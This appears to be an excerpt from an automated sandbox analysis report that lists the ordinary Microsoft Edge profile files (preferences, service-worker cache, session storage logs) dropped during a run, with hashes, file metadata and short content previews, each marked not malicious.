Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904566875568","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3d7b4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10944
Entropy (8bit):	5.1595815897693855
Encrypted:	false
SSDEEP:	192:st6kdplsfb7IlN6xykdjeDPYKwFOO8obV+FTZQwne1y93HPXYJ:st6Qlsfb7i4LxbG9Qwz90
MD5:	A69B58634BEDFAC8D1946076B296A264
SHA1:	D5A108ED4E8343FA358A4B35255699C8ECC8A2B5
SHA-256:	47B9AFB0A5E04547DADCA34DF322992C7FF17042C7A25A4D359859AD3652F75F
SHA-512:	A2E0754C40D41454F3ECDDE2AF0E43629ED6D184DFC0187B58ED55D978CFC238403F251CE08F04262F9DB82A197710D449D3CB78252F6ACA92475D13FF03F5B2
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904566875568","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3ff50.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10944
Entropy (8bit):	5.1595815897693855
Encrypted:	false
SSDEEP:	192:st6kdplsfb7IlN6xykdjeDPYKwFOO8obV+FTZQwne1y93HPXYJ:st6Qlsfb7i4LxbG9Qwz90
MD5:	A69B58634BEDFAC8D1946076B296A264
SHA1:	D5A108ED4E8343FA358A4B35255699C8ECC8A2B5
SHA-256:	47B9AFB0A5E04547DADCA34DF322992C7FF17042C7A25A4D359859AD3652F75F
SHA-512:	A2E0754C40D41454F3ECDDE2AF0E43629ED6D184DFC0187B58ED55D978CFC238403F251CE08F04262F9DB82A197710D449D3CB78252F6ACA92475D13FF03F5B2
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904566875568","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF44cf3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10944
Entropy (8bit):	5.1595815897693855
Encrypted:	false
SSDEEP:	192:st6kdplsfb7IlN6xykdjeDPYKwFOO8obV+FTZQwne1y93HPXYJ:st6Qlsfb7i4LxbG9Qwz90
MD5:	A69B58634BEDFAC8D1946076B296A264
SHA1:	D5A108ED4E8343FA358A4B35255699C8ECC8A2B5
SHA-256:	47B9AFB0A5E04547DADCA34DF322992C7FF17042C7A25A4D359859AD3652F75F
SHA-512:	A2E0754C40D41454F3ECDDE2AF0E43629ED6D184DFC0187B58ED55D978CFC238403F251CE08F04262F9DB82A197710D449D3CB78252F6ACA92475D13FF03F5B2
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904566875568","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.571802471726618
Encrypted:	false
SSDEEP:	768:vLhm7VWPPjf038F1+UoAYDCx9Tuqh0VfUC9xbog/OV/F8ctrwepstuE:vLhm7VWPPjf03u1jaUScWltT
MD5:	1DCA8DA51F300D943139D4CA44748C9D
SHA1:	20C74D7694BCDFB517CDAC9D30DEA02B37FAF235
SHA-256:	3D26AA050A778F4610E3E2740AC20BAEDA4DCAAA0DDD6F97FC78126E0901EA30
SHA-512:	99D71C73CA5D733DF23B9195D3775E07C4E400203F1B89BA0C15700B7F427037C05BE31F925B86618FA5D8A556B1AED81D8BD3ED39EF2BBFE8A237BD0F4B16AE
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904566154328","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904566154328","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF38b2a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.571802471726618
Encrypted:	false
SSDEEP:	768:vLhm7VWPPjf038F1+UoAYDCx9Tuqh0VfUC9xbog/OV/F8ctrwepstuE:vLhm7VWPPjf03u1jaUScWltT
MD5:	1DCA8DA51F300D943139D4CA44748C9D
SHA1:	20C74D7694BCDFB517CDAC9D30DEA02B37FAF235
SHA-256:	3D26AA050A778F4610E3E2740AC20BAEDA4DCAAA0DDD6F97FC78126E0901EA30
SHA-512:	99D71C73CA5D733DF23B9195D3775E07C4E400203F1B89BA0C15700B7F427037C05BE31F925B86618FA5D8A556B1AED81D8BD3ED39EF2BBFE8A237BD0F4B16AE
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904566154328","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904566154328","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3b566.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.571802471726618
Encrypted:	false
SSDEEP:	768:vLhm7VWPPjf038F1+UoAYDCx9Tuqh0VfUC9xbog/OV/F8ctrwepstuE:vLhm7VWPPjf03u1jaUScWltT
MD5:	1DCA8DA51F300D943139D4CA44748C9D
SHA1:	20C74D7694BCDFB517CDAC9D30DEA02B37FAF235
SHA-256:	3D26AA050A778F4610E3E2740AC20BAEDA4DCAAA0DDD6F97FC78126E0901EA30
SHA-512:	99D71C73CA5D733DF23B9195D3775E07C4E400203F1B89BA0C15700B7F427037C05BE31F925B86618FA5D8A556B1AED81D8BD3ED39EF2BBFE8A237BD0F4B16AE
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904566154328","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904566154328","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2394
Entropy (8bit):	5.807551217635157
Encrypted:	false
SSDEEP:	48:F2emOMrd6JfBqhrdey0ddrd60BqLrdqBqM:F1mOMx6Jchxydx6NLxbM
MD5:	55D3C4C8756172AD2B356AD93D761782
SHA1:	CD0CBC4FD66F6A4A1E0340A468FE718BA98AE6B8
SHA-256:	61063CD73750487F6E1A802CE5476355D0BFB3B124DDE58DEAC64558C36BBF08
SHA-512:	DB47A461CCF2ABA8284B4204EAEF658BBE2C01E7C8F396A2C5372074A18C2349BFC9A41214117A9108BEC76AA4EA77A220FE2083D108D6354130C5FBD950DD3F
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.+Z}.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8.....@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.17165142639226
Encrypted:	false
SSDEEP:	6:iOrvpXs1Fi23oH+TcwtE/a252KLl5vOyq2PFi23oH+TcwtE/a2ZIFUv:71KZYeb8xLuyvdZYeb8J2FUv
MD5:	BF8F93ECE3A45C1F11C03F128F95748F
SHA1:	A87B8DBEE7B314BC97D816BB03CD4BD21E74BE5C
SHA-256:	BB8FAA62AAB4132DFD04BBC90E49709868BC76A0E2BEFBAABCAA7DD5AF7A9509
SHA-512:	C54A6F7C18E1B52C74A73A46115D23AAD31EB785F9E7C29E290E030FA112A7893A7468D992299BDD8A43FE48702AFD30F7BD6010532BFD32C4E68D737AB37FB1
Malicious:	false
Preview:	2025/01/09-08:56:15.903 1230 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/09-08:56:15.918 1230 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	115808
Entropy (8bit):	5.577451242692885
Encrypted:	false
SSDEEP:	1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNt4newXRvlu:B9LyxPXfOxr1lMe1nL/5L/TXJ6LwXR0
MD5:	A0F9441A13A7B770E4EAA66D41492720
SHA1:	1CEE888FA1087BB74DF9417836909940AD8D9C30
SHA-256:	6F90F0C55711C941A80851FBB5F57766295C082FE6C58EE5D452D6F664B36946
SHA-512:	07A4EC267F8F520D31081F837E807929B1D5487674CFCAE358DD431B9B2C3C02CC4FDFCE57558499E587CE78C8ABC2D5DCA647D243073D8285044331746D7218
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	190369
Entropy (8bit):	6.389249946843911
Encrypted:	false
SSDEEP:	3072:fONva4vKOA5wcYbQIOUL/L191AKoB0sB12AmA4CjBP:75wxQIxL/BbW0Y179V
MD5:	747F83BFAC0F88B160811BB055B79944
SHA1:	23ECE93375CAC43FFC359A93EAB7246A7492A27A
SHA-256:	55CCDD046C2290D9DC8AC92DC80C038B2A95368414192ACE65B994824E510E5E
SHA-512:	2A2C8A745DF581A330666C55A87FD1F693ECB0E33E06827A18959D0AAFFA83FF8C20F6F0C8E50E1DD28EA4088C7C79091BD2B00490B9CF0DA7423D2A0D941D74
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;o....x.H........,T.8..`,.....L`.....,T...`......L`......RcB..e....exports...Rcj.......module....Rcb......define....Rb":0.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q...VIz.{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....d...,T.`.`z.....L`..........a............a.........Dr8..............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:78uTXl/ltV/lxEg1sC/ln:3gbCt
MD5:	6929BAABC9942DB313D701D4B36AD592
SHA1:	1721801F01C3F8C82C6CD7F9F2CAD4FCC62B0F2D
SHA-256:	8D0CBA4D0C2E7CFD151D356174C2EE1B09341903054882990F90342987205D96
SHA-512:	CEBD95FA8E71CC783E75A11A1EF0959045D96B206C8CFF5BDD2F48FB1889DED9BBFFE3FE9D924D02FB7C90464411018BE03C67C2B6E29467CE10EF0F8DB97417
Malicious:	false
Preview:	@.....w.oy retne.........................X....,................;.!../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:78uTXl/ltV/lxEg1sC/ln:3gbCt
MD5:	6929BAABC9942DB313D701D4B36AD592
SHA1:	1721801F01C3F8C82C6CD7F9F2CAD4FCC62B0F2D
SHA-256:	8D0CBA4D0C2E7CFD151D356174C2EE1B09341903054882990F90342987205D96
SHA-512:	CEBD95FA8E71CC783E75A11A1EF0959045D96B206C8CFF5BDD2F48FB1889DED9BBFFE3FE9D924D02FB7C90464411018BE03C67C2B6E29467CE10EF0F8DB97417
Malicious:	false
Preview:	@.....w.oy retne.........................X....,................;.!../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3b6ce.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:78uTXl/ltV/lxEg1sC/ln:3gbCt
MD5:	6929BAABC9942DB313D701D4B36AD592
SHA1:	1721801F01C3F8C82C6CD7F9F2CAD4FCC62B0F2D
SHA-256:	8D0CBA4D0C2E7CFD151D356174C2EE1B09341903054882990F90342987205D96
SHA-512:	CEBD95FA8E71CC783E75A11A1EF0959045D96B206C8CFF5BDD2F48FB1889DED9BBFFE3FE9D924D02FB7C90464411018BE03C67C2B6E29467CE10EF0F8DB97417
Malicious:	false
Preview:	@.....w.oy retne.........................X....,................;.!../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	6147
Entropy (8bit):	3.3978311844549234
Encrypted:	false
SSDEEP:	192:L07q9Oj0VAmP+Vjh9Xp+SmEKi+D0Ll9iSrkMXqd:H9OjHh9Xp+SmrqLl9iSrXad
MD5:	D30CC61392C9832D968D4814EAF98D6F
SHA1:	8BD22134E95257978516BB85D0FF9E78945935E9
SHA-256:	6AF5CC475EADF7585CCEF32AA392FD523FF5634EE313571E4A5C5F9B9C8B493B
SHA-512:	AC24A667CA0B6286D2C8740C646283162091BC50A72D18243F0D6D3E032766F785B777F94BA10D4079FA03F0AB91C86B230527A3418DF02C34BC82AB04E8BC55
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f..................b................next-map-id.1.Cnamespace-2534a972_723e_4d8e_b229_134c50beb754-https://ntp.msn.com/.0....................map-0-shd_sweeper.-{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.1.s.-.p.n.p.f.e.d.l.o.c.c.f.,.p.n.p.w.x.e.x.p.i.r.e.-.c.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.-.c.a.p.c.o.n.f.2.t.3.,.p.r.g.-.1.s.w.-.s.a.-.s.p.7.-.t.2.,.p.r.g.-.f.i.n.-.c.l.e.f.t.r.a.,.r.o.u.t.e.f.i.n.a.n.c.e.p.r.o.d.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.t.r.a.f.f.i.c.-.t.r.a.n.-.n.y.-.c.,.p.r.g.-.p.2.-.l.d.n.y.c.t.-.t.r.a.n.s.i.t.,.p.r.g.-.p.2.-.t.r.a.n.-.t.r.d.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.c.o.o.k.i.e.s.y.n.c.,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.205280215836891
Encrypted:	false
SSDEEP:	6:iOrvk7L+q2PFi23oH+TcwtrQMxIFUtJvkcq1ZmwPvkchjLVkwOFi23oH+TcwtrQq:7cL+vdZYebCFUtzs/1hjLV5wZYebtJ
MD5:	46DF02A29A8204E35A2E7CE39A54DEE5
SHA1:	4773578A024739BFFFB8417FD070493F60C864C9
SHA-256:	9DEEB3EAB8EB7B5BB635FD5FCDEED1CDCBF02993FD1BEFF16D6716695E383C96
SHA-512:	E91C25CBBA8239132A01E30BCD47F56DB3B62BBC5B5A5964E33E8F628F23DE10D029D30B99CE097F0E0F13198703725A028F82F865F260619CE8CDEAC828D9A4
Malicious:	false
Preview:	2025/01/09-08:56:06.846 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-08:56:06.963 1c7c Recovering log #3.2025/01/09-08:56:06.968 1c7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.205280215836891
Encrypted:	false
SSDEEP:	6:iOrvk7L+q2PFi23oH+TcwtrQMxIFUtJvkcq1ZmwPvkchjLVkwOFi23oH+TcwtrQq:7cL+vdZYebCFUtzs/1hjLV5wZYebtJ
MD5:	46DF02A29A8204E35A2E7CE39A54DEE5
SHA1:	4773578A024739BFFFB8417FD070493F60C864C9
SHA-256:	9DEEB3EAB8EB7B5BB635FD5FCDEED1CDCBF02993FD1BEFF16D6716695E383C96
SHA-512:	E91C25CBBA8239132A01E30BCD47F56DB3B62BBC5B5A5964E33E8F628F23DE10D029D30B99CE097F0E0F13198703725A028F82F865F260619CE8CDEAC828D9A4
Malicious:	false
Preview:	2025/01/09-08:56:06.846 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-08:56:06.963 1c7c Recovering log #3.2025/01/09-08:56:06.968 1c7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13380904568637940

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.842335111572233
Encrypted:	false
SSDEEP:	24:3sFXGhmipsAF4unxctLp3X2amEtG1ChqLWSkwlC9QKkOAM48H:36GhmizFKLp2FEkChntwl/HOpZH
MD5:	661DB0B226FB9E74EF42BC97C3B1922B
SHA1:	C5F5A386C3FFD6EF60092E0AC6957139B07B94B6
SHA-256:	83F2DDD6D8774223FE09A21170E7D0DB7C07C3B28BA70FD218FB042D5BE8AF08
